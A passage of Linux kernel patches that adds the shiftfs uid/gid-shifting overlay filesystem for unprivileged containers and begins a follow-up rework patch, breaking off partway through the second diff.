+that the container is operating with a uid-shifted unprivileged root
+but sometimes needs to make use of or work with a filesystem image
+that has root at real uid 0.
+
+The mechanism is to allow any subordinate mount namespace to mount a
+shiftfs filesystem (by marking it FS_USERNS_MOUNT) but only allowing
+it to mount marked subtrees (using the -o mark option as root).  Once
+mounted, the subtree is mapped via the super block user namespace so
+that the interior ids of the mounting user namespace are the ids
+written to the filesystem.
+
+Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
+[ saf: use designated initializers for path declarations to fix errors
+  with struct randomization ]
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+[update: port to 5.0]
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/Kconfig                 |   8 +
+ fs/Makefile                |   1 +
+ fs/shiftfs.c               | 780 +++++++++++++++++++++++++++++++++++++
+ include/uapi/linux/magic.h |   2 +
+ 4 files changed, 791 insertions(+)
+ create mode 100644 fs/shiftfs.c
+
+diff --git a/fs/Kconfig b/fs/Kconfig
+index 2685a4d0d353..b53bece1e940 100644
+--- a/fs/Kconfig
++++ b/fs/Kconfig
+@@ -128,6 +128,14 @@ source "fs/autofs/Kconfig"
+ source "fs/fuse/Kconfig"
+ source "fs/overlayfs/Kconfig"
+ 
++config SHIFT_FS
++	tristate "UID/GID shifting overlay filesystem for containers"
++	help
++	  This filesystem can overlay any mounted filesystem and shift
++	  the uid/gid the files appear at.  The idea is that
++	  unprivileged containers can use this to mount root volumes
++	  using this technique.
++
+ menu "Caches"
+ 
+ source "fs/netfs/Kconfig"
+diff --git a/fs/Makefile b/fs/Makefile
+index 4dea17840761..628632dcb9b1 100644
+--- a/fs/Makefile
++++ b/fs/Makefile
+@@ -137,3 +137,4 @@ obj-$(CONFIG_EFIVAR_FS)		+= efivarfs/
+ obj-$(CONFIG_EROFS_FS)		+= erofs/
+ obj-$(CONFIG_VBOXSF_FS)		+= vboxsf/
+ obj-$(CONFIG_ZONEFS_FS)		+= zonefs/
++obj-$(CONFIG_SHIFT_FS)		+= shiftfs.o
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+new file mode 100644
+index 000000000000..f7cada126daa
+--- /dev/null
++++ b/fs/shiftfs.c
+@@ -0,0 +1,780 @@
++#include <linux/cred.h>
++#include <linux/mount.h>
++#include <linux/file.h>
++#include <linux/fs.h>
++#include <linux/namei.h>
++#include <linux/module.h>
++#include <linux/kernel.h>
++#include <linux/magic.h>
++#include <linux/parser.h>
++#include <linux/seq_file.h>
++#include <linux/statfs.h>
++#include <linux/slab.h>
++#include <linux/user_namespace.h>
++#include <linux/uidgid.h>
++#include <linux/xattr.h>
++
++struct shiftfs_super_info {
++	struct vfsmount *mnt;
++	struct user_namespace *userns;
++	bool mark;
++};
++
++static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
++				       struct dentry *dentry);
++
++enum {
++	OPT_MARK,
++	OPT_LAST,
++};
++
++/* global filesystem options */
++static const match_table_t tokens = {
++	{ OPT_MARK, "mark" },
++	{ OPT_LAST, NULL }
++};
++
++static const struct cred *shiftfs_get_up_creds(struct super_block *sb)
++{
++	struct shiftfs_super_info *ssi = sb->s_fs_info;
++	struct cred *cred = prepare_creds();
++
++	if (!cred)
++		return NULL;
++
++	cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid));
++	cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid));
++	put_user_ns(cred->user_ns);
++	cred->user_ns = get_user_ns(ssi->userns);
++
++	return cred;
++}
++
++static const struct cred *shiftfs_new_creds(const struct cred **newcred,
++					    struct super_block *sb)
++{
++	const struct cred *cred = shiftfs_get_up_creds(sb);
++
++	*newcred = cred;
++
++	if (cred)
++		cred = override_creds(cred);
++	else
++		printk(KERN_ERR "shiftfs: Credential override failed: no memory\n");
++
++	return cred;
++}
++
++static void shiftfs_old_creds(const struct cred *oldcred,
++			      const struct cred **newcred)
++{
++	if (!*newcred)
++		return;
++
++	revert_creds(oldcred);
++	put_cred(*newcred);
++}
++
++static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
++{
++	char *p;
++	substring_t args[MAX_OPT_ARGS];
++
++	ssi->mark = false;
++
++	while ((p = strsep(&options, ",")) != NULL) {
++		int token;
++
++		if (!*p)
++			continue;
++
++		token = match_token(p, tokens, args);
++		switch (token) {
++		case OPT_MARK:
++			ssi->mark = true;
++			break;
++		default:
++			return -EINVAL;
++		}
++	}
++	return 0;
++}
++
++static void shiftfs_d_release(struct dentry *dentry)
++{
++	struct dentry *real = dentry->d_fsdata;
++
++	dput(real);
++}
++
++static struct dentry *shiftfs_d_real(struct dentry *dentry,
++				     const struct inode *inode)
++{
++	struct dentry *real = dentry->d_fsdata;
++
++	if (unlikely(real->d_flags & DCACHE_OP_REAL))
++		return real->d_op->d_real(real, real->d_inode);
++
++	return real;
++}
++
++static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
++{
++	struct dentry *real = dentry->d_fsdata;
++
++	if (d_unhashed(real))
++		return 0;
++
++	if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE))
++		return 1;
++
++	return real->d_op->d_weak_revalidate(real, flags);
++}
++
++static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int ret;
++
++	if (d_unhashed(real))
++		return 0;
++
++	/*
++	 * inode state of underlying changed from positive to negative
++	 * or vice versa; force a lookup to update our view
++	 */
++	if (d_is_negative(real) != d_is_negative(dentry))
++		return 0;
++
++	if (!(real->d_flags & DCACHE_OP_REVALIDATE))
++		return 1;
++
++	ret = real->d_op->d_revalidate(real, flags);
++
++	if (ret == 0 && !(flags & LOOKUP_RCU))
++		d_invalidate(real);
++
++	return ret;
++}
++
++static const struct dentry_operations shiftfs_dentry_ops = {
++	.d_release	= shiftfs_d_release,
++	.d_real		= shiftfs_d_real,
++	.d_revalidate	= shiftfs_d_revalidate,
++	.d_weak_revalidate = shiftfs_d_weak_revalidate,
++};
++
++static int shiftfs_readlink(struct dentry *dentry, char __user *data,
++			    int flags)
++{
++	struct dentry *real = dentry->d_fsdata;
++	const struct inode_operations *iop = real->d_inode->i_op;
++
++	if (iop->readlink)
++		return iop->readlink(real, data, flags);
++
++	return -EINVAL;
++}
++
++static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
++				    struct delayed_call *done)
++{
++	if (dentry) {
++		struct dentry *real = dentry->d_fsdata;
++		struct inode *reali = real->d_inode;
++		const struct inode_operations *iop = reali->i_op;
++		const char *res = ERR_PTR(-EPERM);
++
++		if (iop->get_link)
++			res = iop->get_link(real, reali, done);
++
++		return res;
++	} else {
++		/* RCU lookup not supported */
++		return ERR_PTR(-ECHILD);
++	}
++}
++
++static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
++			    const char *name, const void *value,
++			    size_t size, int flags)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int err = -EOPNOTSUPP;
++	const struct cred *oldcred, *newcred;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	err = vfs_setxattr(real, name, value, size, flags);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static int shiftfs_xattr_get(const struct xattr_handler *handler,
++			     struct dentry *dentry, struct inode *inode,
++			     const char *name, void *value, size_t size)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	err = vfs_getxattr(real, name, value, size);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
++				 size_t size)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	err = vfs_listxattr(real, list, size);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static int shiftfs_removexattr(struct dentry *dentry, const char *name)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	err = vfs_removexattr(real, name);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static int shiftfs_xattr_set(const struct xattr_handler *handler,
++			     struct dentry *dentry, struct inode *inode,
++			     const char *name, const void *value, size_t size,
++			     int flags)
++{
++	if (!value)
++		return shiftfs_removexattr(dentry, name);
++	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
++}
++
++static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry)
++{
++	struct inode *reali;
++
++	if (!dentry)
++		return;
++
++	reali = dentry->d_inode;
++
++	if (!reali->i_op->get_link)
++		inode->i_opflags |= IOP_NOFOLLOW;
++
++	inode->i_mapping = reali->i_mapping;
++	inode->i_private = dentry;
++}
++
++static int shiftfs_make_object(struct inode *dir, struct dentry *dentry,
++			       umode_t mode, const char *symlink,
++			       struct dentry *hardlink, bool excl)
++{
++	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
++	struct inode *reali = real->d_inode, *newi;
++	const struct inode_operations *iop = reali->i_op;
++	int err;
++	const struct cred *oldcred, *newcred;
++	bool op_ok = false;
++
++	if (hardlink) {
++		op_ok = iop->link;
++	} else {
++		switch (mode & S_IFMT) {
++		case S_IFDIR:
++			op_ok = iop->mkdir;
++			break;
++		case S_IFREG:
++			op_ok = iop->create;
++			break;
++		case S_IFLNK:
++			op_ok = iop->symlink;
++		}
++	}
++	if (!op_ok)
++		return -EINVAL;
++
++
++	newi = shiftfs_new_inode(dentry->d_sb, mode, NULL);
++	if (!newi)
++		return -ENOMEM;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++
++	inode_lock_nested(reali, I_MUTEX_PARENT);
++
++	err = -EINVAL;		/* shut gcc up about uninit var */
++	if (hardlink) {
++		struct dentry *realhardlink = hardlink->d_fsdata;
++
++		err = vfs_link(realhardlink, reali, new, NULL);
++	} else {
++		switch (mode & S_IFMT) {
++		case S_IFDIR:
++			err = vfs_mkdir(reali, new, mode);
++			break;
++		case S_IFREG:
++			err = vfs_create(reali, new, mode, excl);
++			break;
++		case S_IFLNK:
++			err = vfs_symlink(reali, new, symlink);
++		}
++	}
++
++	shiftfs_old_creds(oldcred, &newcred);
++
++	if (err)
++		goto out_dput;
++
++	shiftfs_fill_inode(newi, new);
++
++	d_instantiate(dentry, newi);
++
++	new = NULL;
++	newi = NULL;
++
++ out_dput:
++	dput(new);
++	iput(newi);
++	inode_unlock(reali);
++
++	return err;
++}
++
++static int shiftfs_create(struct inode *dir, struct dentry *dentry,
++			  umode_t mode,  bool excl)
++{
++	mode |= S_IFREG;
++
++	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl);
++}
++
++static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
++			 umode_t mode)
++{
++	mode |= S_IFDIR;
++
++	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false);
++}
++
++static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
++			struct dentry *dentry)
++{
++	return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false);
++}
++
++static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
++			   const char *symlink)
++{
++	return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false);
++}
++
++static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
++{
++	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
++	struct inode *reali = real->d_inode;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	inode_lock_nested(reali, I_MUTEX_PARENT);
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++
++	if (rmdir)
++		err = vfs_rmdir(reali, new);
++	else
++		err = vfs_unlink(reali, new, NULL);
++
++	shiftfs_old_creds(oldcred, &newcred);
++	inode_unlock(reali);
++
++	return err;
++}
++
++static int shiftfs_unlink(struct inode *dir, struct dentry *dentry)
++{
++	return shiftfs_rm(dir, dentry, false);
++}
++
++static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
++{
++	return shiftfs_rm(dir, dentry, true);
++}
++
++static int shiftfs_rename(struct inode *olddir, struct dentry *old,
++			  struct inode *newdir, struct dentry *new,
++			  unsigned int flags)
++{
++	struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private,
++		*realold = old->d_fsdata,
++		*realnew = new->d_fsdata, *trap;
++	struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode;
++	int err = -EINVAL;
++	const struct cred *oldcred, *newcred;
++
++	trap = lock_rename(rndd, rodd);
++
++	if (trap == realold || trap == realnew)
++		goto out_unlock;
++
++	oldcred = shiftfs_new_creds(&newcred, old->d_sb);
++
++	err = vfs_rename(realolddir, realold, realnewdir,
++			 realnew, NULL, flags);
++
++	shiftfs_old_creds(oldcred, &newcred);
++
++ out_unlock:
++	unlock_rename(rndd, rodd);
++
++	return err;
++}
++
++static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
++				     unsigned int flags)
++{
++	struct dentry *real = dir->i_private, *new;
++	struct inode *reali = real->d_inode, *newi;
++	const struct cred *oldcred, *newcred;
++
++	inode_lock(reali);
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len);
++	shiftfs_old_creds(oldcred, &newcred);
++	inode_unlock(reali);
++
++	if (IS_ERR(new))
++		return new;
++
++	dentry->d_fsdata = new;
++
++	newi = NULL;
++	if (!new->d_inode)
++		goto out;
++
++	newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new);
++	if (!newi) {
++		dput(new);
++		return ERR_PTR(-ENOMEM);
++	}
++
++ out:
++	return d_splice_alias(newi, dentry);
++}
++
++static int shiftfs_permission(struct inode *inode, int mask)
++{
++	struct dentry *real = inode->i_private;
++	struct inode *reali = real->d_inode;
++	const struct inode_operations *iop = reali->i_op;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	if (mask & MAY_NOT_BLOCK)
++		return -ECHILD;
++
++	oldcred = shiftfs_new_creds(&newcred, inode->i_sb);
++	if (iop->permission)
++		err = iop->permission(reali, mask);
++	else
++		err = generic_permission(reali, mask);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
++{
++	struct dentry *real = dentry->d_fsdata;
++	struct inode *reali = real->d_inode;
++	const struct inode_operations *iop = reali->i_op;
++	struct iattr newattr = *attr;
++	const struct cred *oldcred, *newcred;
++	struct super_block *sb = dentry->d_sb;
++	int err;
++
++	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
++	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	inode_lock(reali);
++	if (iop->setattr)
++		err = iop->setattr(real, &newattr);
++	else
++		err = simple_setattr(real, &newattr);
++	inode_unlock(reali);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	if (err)
++		return err;
++
++	/* all OK, reflect the change on our inode */
++	setattr_copy(d_inode(dentry), attr);
++	return 0;
++}
++
++static int shiftfs_getattr(const struct path *path, struct kstat *stat,
++			   u32 request_mask, unsigned int query_flags)
++{
++	struct inode *inode = path->dentry->d_inode;
++	struct dentry *real = path->dentry->d_fsdata;
++	struct inode *reali = real->d_inode;
++	const struct inode_operations *iop = reali->i_op;
++	struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real };
++	int err = 0;
++
++	if (iop->getattr)
++		err = iop->getattr(&newpath, stat, request_mask, query_flags);
++	else
++		generic_fillattr(reali, stat);
++
++	if (err)
++		return err;
++
++	/* transform the underlying id */
++	stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid));
++	stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid));
++	return 0;
++}
++
++static const struct inode_operations shiftfs_inode_ops = {
++	.lookup		= shiftfs_lookup,
++	.getattr	= shiftfs_getattr,
++	.setattr	= shiftfs_setattr,
++	.permission	= shiftfs_permission,
++	.mkdir		= shiftfs_mkdir,
++	.symlink	= shiftfs_symlink,
++	.get_link	= shiftfs_get_link,
++	.readlink	= shiftfs_readlink,
++	.unlink		= shiftfs_unlink,
++	.rmdir		= shiftfs_rmdir,
++	.rename		= shiftfs_rename,
++	.link		= shiftfs_link,
++	.create		= shiftfs_create,
++	.mknod		= NULL,	/* no special files currently */
++	.listxattr	= shiftfs_listxattr,
++};
++
++static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
++				       struct dentry *dentry)
++{
++	struct inode *inode;
++
++	inode = new_inode(sb);
++	if (!inode)
++		return NULL;
++
++	/*
++	 * our inode is completely vestigial.  All lookups, getattr
++	 * and permission checks are done on the underlying inode, so
++	 * what the user sees is entirely from the underlying inode.
++	 */
++	mode &= S_IFMT;
++
++	inode->i_ino = get_next_ino();
++	inode->i_mode = mode;
++	inode->i_flags |= S_NOATIME | S_NOCMTIME;
++
++	inode->i_op = &shiftfs_inode_ops;
++
++	shiftfs_fill_inode(inode, dentry);
++
++	return inode;
++}
++
++static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *ssi = sb->s_fs_info;
++
++	if (ssi->mark)
++		seq_show_option(m, "mark", NULL);
++
++	return 0;
++}
++
++static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *ssi = sb->s_fs_info;
++	struct dentry *root = sb->s_root;
++	struct dentry *realroot = root->d_fsdata;
++	struct path realpath = { .mnt = ssi->mnt, .dentry = realroot };
++	int err;
++
++	err = vfs_statfs(&realpath, buf);
++	if (err)
++		return err;
++
++	buf->f_type = sb->s_magic;
++
++	return 0;
++}
++
++static void shiftfs_put_super(struct super_block *sb)
++{
++	struct shiftfs_super_info *ssi = sb->s_fs_info;
++
++	mntput(ssi->mnt);
++	put_user_ns(ssi->userns);
++	kfree(ssi);
++}
++
++static const struct xattr_handler shiftfs_xattr_handler = {
++	.prefix = "",
++	.get    = shiftfs_xattr_get,
++	.set    = shiftfs_xattr_set,
++};
++
++const struct xattr_handler *shiftfs_xattr_handlers[] = {
++	&shiftfs_xattr_handler,
++	NULL
++};
++
++static const struct super_operations shiftfs_super_ops = {
++	.put_super	= shiftfs_put_super,
++	.show_options	= shiftfs_show_options,
++	.statfs		= shiftfs_statfs,
++};
++
++struct shiftfs_data {
++	void *data;
++	const char *path;
++};
++
++static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
++			      int silent)
++{
++	struct shiftfs_data *data = raw_data;
++	char *name = kstrdup(data->path, GFP_KERNEL);
++	int err = -ENOMEM;
++	struct shiftfs_super_info *ssi = NULL;
++	struct path path;
++	struct dentry *dentry;
++
++	if (!name)
++		goto out;
++
++	ssi = kzalloc(sizeof(*ssi), GFP_KERNEL);
++	if (!ssi)
++		goto out;
++
++	err = -EPERM;
++	err = shiftfs_parse_options(ssi, data->data);
++	if (err)
++		goto out;
++
++	/* to mark a mount point, must be real root */
++	if (ssi->mark && !capable(CAP_SYS_ADMIN))
++		goto out;
++
++	/* else to mount a mark, must be userns admin */
++	if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
++		goto out;
++
++	err = kern_path(name, LOOKUP_FOLLOW, &path);
++	if (err)
++		goto out;
++
++	err = -EPERM;
++
++	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
++		err = -ENOTDIR;
++		goto out_put;
++	}
++
++	sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
++	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
++		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
++		err = -EINVAL;
++		goto out_put;
++	}
++
++	if (ssi->mark) {
++		/*
++		 * this part is visible unshifted, so make sure there are no
++		 * executables that could be used to gain suid
++		 * privileges
++		 */
++		sb->s_iflags = SB_I_NOEXEC;
++		ssi->mnt = path.mnt;
++		dentry = path.dentry;
++	} else {
++		struct shiftfs_super_info *mp_ssi;
++
++		/*
++		 * this leg executes if we're admin capable in
++		 * the namespace, so be very careful
++		 */
++		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
++			goto out_put;
++		mp_ssi = path.dentry->d_sb->s_fs_info;
++		if (!mp_ssi->mark)
++			goto out_put;
++		ssi->mnt = mntget(mp_ssi->mnt);
++		dentry = dget(path.dentry->d_fsdata);
++		path_put(&path);
++	}
++	ssi->userns = get_user_ns(dentry->d_sb->s_user_ns);
++	sb->s_fs_info = ssi;
++	sb->s_magic = SHIFTFS_MAGIC;
++	sb->s_op = &shiftfs_super_ops;
++	sb->s_xattr = shiftfs_xattr_handlers;
++	sb->s_d_op = &shiftfs_dentry_ops;
++	sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry));
++	sb->s_root->d_fsdata = dentry;
++
++	return 0;
++
++ out_put:
++	path_put(&path);
++ out:
++	kfree(name);
++	kfree(ssi);
++	return err;
++}
++
++static struct dentry *shiftfs_mount(struct file_system_type *fs_type,
++				    int flags, const char *dev_name, void *data)
++{
++	struct shiftfs_data d = { data, dev_name };
++
++	return mount_nodev(fs_type, flags, &d, shiftfs_fill_super);
++}
++
++static struct file_system_type shiftfs_type = {
++	.owner		= THIS_MODULE,
++	.name		= "shiftfs",
++	.mount		= shiftfs_mount,
++	.kill_sb	= kill_anon_super,
++	.fs_flags	= FS_USERNS_MOUNT,
++};
++
++static int __init shiftfs_init(void)
++{
++	return register_filesystem(&shiftfs_type);
++}
++
++static void __exit shiftfs_exit(void)
++{
++	unregister_filesystem(&shiftfs_type);
++}
++
++MODULE_ALIAS_FS("shiftfs");
++MODULE_AUTHOR("James Bottomley");
++MODULE_DESCRIPTION("uid/gid shifting bind filesystem");
++MODULE_LICENSE("GPL v2");
++module_init(shiftfs_init)
++module_exit(shiftfs_exit)
+diff --git a/include/uapi/linux/magic.h b/include/uapi/linux/magic.h
+index 6325d1d0e90f..1f70efb41565 100644
+--- a/include/uapi/linux/magic.h
++++ b/include/uapi/linux/magic.h
+@@ -102,4 +102,6 @@
+ #define DEVMEM_MAGIC		0x454d444d	/* "DMEM" */
+ #define SECRETMEM_MAGIC		0x5345434d	/* "SECM" */
+ 
++#define SHIFTFS_MAGIC		0x6a656a62
++
+ #endif /* __LINUX_MAGIC_H__ */
+-- 
+2.39.2
+
+From 7b502b7e97db8ec9deff14f434eed2f2fbc0cd2f Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Thu, 4 Apr 2019 15:39:12 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework and extend
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1823186
+
+/* Introduction */
+The shiftfs filesystem is implemented as a stacking filesystem. Since it is
+a stacking filesystem it shares concepts with overlayfs and ecryptfs.
+Usually, shiftfs will be stacked upon another filesystem. The filesystem on
+top - shiftfs - is referred to as "upper filesystem" or "overlay" and the
+filesystem it is stacked upon is referred to as "lower filesystem" or
+"underlay".
+
+/* Marked and Unmarked shiftfs mounts */
+To use shiftfs it is necessary that a given mount is marked as shiftable via
+the "mark" mount option. Any mount of shiftfs without the "mark" mount option
+not on top of a shiftfs mount with the "mark" mount option will be refused with
+EPERM.
+After a marked shiftfs mount has been performed other shiftfs mounts
+referencing the marked shiftfs mount can be created. These secondary shiftfs
+mounts are usually what is of interest.
+The marked shiftfs mount will take a reference to the underlying mountpoint of
+the directory it is marking as shiftable. Any unmarked shiftfs mounts
+referencing this marked shiftfs mount will take a second reference to this
+directory as well. This ensures that the underlying marked shiftfs mount can be
+unmounted thereby dropping the reference to the underlying directory without
+invalidating the mountpoint of said directory since the non-marked shiftfs
+mount still holds another reference to it.
+
+/* Stacking Depth */
+Shiftfs tries to keep the stack as flat as possible to avoid hitting the
+kernel enforced filesystem stacking limit.
+
+/* Permission Model */
+When the mark shiftfs mount is created shiftfs will record the credentials of
+the creator of the super block and stash it in the super block. When other
+non-mark shiftfs mounts are created that reference the mark shiftfs mount they
+will stash another reference to the creators credentials. Before calling into
+the underlying filesystem shiftfs will switch to the creators credentials and
+revert to the original credentials after the underlying filesystem operation
+returns.
+
+/* Mount Options */
+- mark
+  When set the mark mount option indicates that the mount in question is
+  allowed to be shifted. Since shiftfs is mountable by user namespace root in a
+  non-initial user namespace, this mount option ensures that the system
+  administrator has decided that the marked mount is safe to be shifted.
+  To mark a mount as shiftable CAP_SYS_ADMIN in the user namespace is required.
+- passthrough={0,1,2,3}
+  This mount option functions as a bitmask. When set to a non-zero value
+  shiftfs will try to act as an invisible shim sitting on top of the
+  underlying filesystem.
+  - 1: Shiftfs will report the filesystem type of the underlay for stat-like
+       system calls.
+  - 2: Shiftfs will pass whitelisted ioctl()s through to the underlay.
+  - 3: Shiftfs will use both 1 and 2.
+Note that mount options on a marked mount cannot be changed.
+
+/* Extended Attributes */
+Shiftfs will make sure to translate extended attributes.
+
+/* Inodes Numbers */
+Shiftfs inode numbers are copied up from the underlying filesystem, i.e.
+shiftfs inode numbers will be identical to the corresponding underlying
+filesystem's inode numbers. This has the advantage that inotify and friends
+should work out of the box.
+(In essence, shiftfs is nothing but a 1:1 mirror of the underlying filesystem's
+ dentries and inodes.)
+
+/* Device Support */
+Shiftfs only supports the creation of pipe and socket devices. Character and
+block devices cannot be created through shiftfs.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/Kconfig   |   10 +
+ fs/shiftfs.c | 1852 ++++++++++++++++++++++++++++++++++++++++----------
+ 2 files changed, 1493 insertions(+), 369 deletions(-)
+
+diff --git a/fs/Kconfig b/fs/Kconfig
+index b53bece1e940..ada9a1234e72 100644
+--- a/fs/Kconfig
++++ b/fs/Kconfig
+@@ -136,6 +136,16 @@ config SHIFT_FS
+ 	  unprivileged containers can use this to mount root volumes
+ 	  using this technique.
+ 
++config SHIFT_FS_POSIX_ACL
++	bool "shiftfs POSIX Access Control Lists"
++	depends on SHIFT_FS
++	select FS_POSIX_ACL
++	help
++	  POSIX Access Control Lists (ACLs) support permissions for users and
++	  groups beyond the owner/group/world scheme.
++
++	  If you don't know what Access Control Lists are, say N.
++
+ menu "Caches"
+ 
+ source "fs/netfs/Kconfig"
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index f7cada126daa..ad1ae5bce6c1 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1,3 +1,4 @@
++#include <linux/capability.h>
+ #include <linux/cred.h>
+ #include <linux/mount.h>
+ #include <linux/file.h>
+@@ -7,83 +8,179 @@
+ #include <linux/kernel.h>
+ #include <linux/magic.h>
+ #include <linux/parser.h>
++#include <linux/security.h>
+ #include <linux/seq_file.h>
+ #include <linux/statfs.h>
+ #include <linux/slab.h>
+ #include <linux/user_namespace.h>
+ #include <linux/uidgid.h>
+ #include <linux/xattr.h>
++#include <linux/posix_acl.h>
++#include <linux/posix_acl_xattr.h>
++#include <linux/uio.h>
+ 
+ struct shiftfs_super_info {
+ 	struct vfsmount *mnt;
+ 	struct user_namespace *userns;
++	/* creds of process who created the super block */
++	const struct cred *creator_cred;
+ 	bool mark;
++	unsigned int passthrough;
++	struct shiftfs_super_info *info_mark;
+ };
+ 
+-static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
+-				       struct dentry *dentry);
++struct shiftfs_file_info {
++	struct path realpath;
++	struct file *realfile;
++};
++
++struct kmem_cache *shiftfs_file_info_cache;
++
++static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
++			       umode_t mode, dev_t dev, struct dentry *dentry);
++
++#define SHIFTFS_PASSTHROUGH_NONE 0
++#define SHIFTFS_PASSTHROUGH_STAT 1
++#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT)
++
++static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
++{
++	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
++		return false;
++
++	if (info->info_mark &&
++	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
++		return false;
++
++	return true;
++}
+ 
+ enum {
+ 	OPT_MARK,
++	OPT_PASSTHROUGH,
+ 	OPT_LAST,
+ };
+ 
+ /* global filesystem options */
+ static const match_table_t tokens = {
+ 	{ OPT_MARK, "mark" },
++	{ OPT_PASSTHROUGH, "passthrough=%u" },
+ 	{ OPT_LAST, NULL }
+ };
+ 
+-static const struct cred *shiftfs_get_up_creds(struct super_block *sb)
++static const struct cred *shiftfs_override_creds(const struct super_block *sb)
+ {
+-	struct shiftfs_super_info *ssi = sb->s_fs_info;
+-	struct cred *cred = prepare_creds();
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 
+-	if (!cred)
+-		return NULL;
++	return override_creds(sbinfo->creator_cred);
++}
++
++static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
++					       struct cred *newcred)
